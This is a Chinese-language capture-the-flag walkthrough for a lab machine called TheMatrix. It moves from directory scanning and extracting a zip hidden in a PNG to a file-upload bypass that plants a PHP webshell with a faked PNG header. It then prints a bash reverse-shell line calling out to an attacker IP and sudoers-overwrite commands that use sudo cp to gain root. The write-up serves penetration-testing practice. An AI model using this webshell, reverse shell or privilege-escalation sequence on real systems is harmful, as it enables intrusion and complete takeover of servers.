先开启靶机,然后访问端口。
然后会有一个页面
第一步,都是众所周知的目录扫描,我是先用dirsearch 但是没有扫描出什么东西,就离谱,然后用dirb 一样的,最后我想起来了一个好用的 ffuf 进行扫描
Dirsearch的扫描结果,没有东西
Dirb 扫描的结果有一个server-status,然后拼接上去看看是什么,发现不对
Ffuf 扫描的结果回发现有一个TheMatrix.php ,然后进行拼接会得到一个登录框
但是你查看源代码之类的,会发现找不到什么。这个时候我就回去看靶场标签了,发现有一个标签是图片隐写,既然是隐写那就用exiftool,binwalk,发现主页面有一张照片可以试试,看看里面有没有什么东西,先下载照片,然后进行收集,因为我是为了好存放所以就创建一个文件夹放在里面了。(你们都知道怎么下载照片我就直接不讲了哈哈)
然后用上面的两个命令进行查看,用binwalk 查看,发现里面有一个压缩包,exiftool 发现在 IEND 后面有额外的数据,有可能是压缩包
把压缩包进行提取,发现没有提取出来,然后我用dd 手动提取然后解压,我把它放在物理机里面解压,发现解压错误,所以可以猜到它的那个图片有损害,然后用FlexHEX,进行修复
把修改完的照片进行上传,直接进行提取,看看能不能把zip提取出来,用 binwalk -e --run-as=root niao.png 这条命令把zip提取出来,然后下载到物理机进行解压,我不知道为什么我的虚拟机解压不了
解压发现要密码,密码我试了好多都没有试出来,最后看到Tips:
1.页面上的每一个内容都有可能是关键的一环
所以我怀疑页面上有我想要的密码,我把页面上的英文全部试了一变发现是TheMatrix
里面的照片有可能是密码或者账号,我试了好久才发现这个(密码本来是不会显示的,我为了让你们清除,所以让它显示了)
登录成功,发现是一个文件上传的
然后查看它的源代码发现了一处恶心的地方,它校验了PNG文件的头部,里面看到PNG的头部是89 50 4E 47 0D 0A 1A 0A,所以就直接写一句话muma,然后用FlexHEX 改放一张照片进去,你要删的东西太多了,不然连接不到
写一句话muma,然后把头文件改成 89 50 4E 47 0D 0A 1A 0A,然后保存,我用的文件名是2.png
然后把那个2.png上传,把bp的拦截打开,然后点击上传文件
然后把20-22行的改成上面写的一句话muma,然后这把2.png改成2.php
然后放行,看文件有没有上传成功,也是成功了,就可以用蚁剑之类的进行连接
用蚁剑连接,然后URL地址是网站网址加你刚刚上传的那个文件改的后缀名,密码是你前面一句话中间引号引起来到那个,然后点测试连接,能连接成功就点添加
点击那个网址然后右键,选择虚拟终端
发现权限不高,但是这么看你们肯定不习惯,那就建立shell(这个只能用公网IP才能连接成功,然后内网是连接成功不了的,或者你可以试试内网穿透(cpolar )试试看,我的话是用公网IP进行测试)
我先在终端监听一个端口,然后在蚁剑那里去设置反弹的条件是:/bin/bash -c 'bash -i >& /dev/tcp/你的公网IP/4444 0>&1' ,然后就过来了,记得打错了就回车,不然容易断开连接
这个是这些文件可能被用于权限提升
发现有sudo那就sudo -l ,这句话的意思是/bin/cp 有执行root的权限
备份当前sudoers文件
sudo /bin/cp /etc/sudoers /etc/sudoers.bak
创建新的sudoers配置,让www-data有全部sudo权限
echo 'www-data ALL=(ALL) NOPASSWD:ALL' > /tmp/newsudoers
用root权限覆盖sudoers文件
sudo /bin/cp /tmp/newsudoers /etc/sudoers
验证权限
sudo -l ,这段话的意思是所有的用户都有权限,直接sudo su 就可以了
获取root 权限
sudo su
也是拿到root 权限了,根据题目的提示,flag在root目录下
然后cat flag.txt 拿到flag也是结束了
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...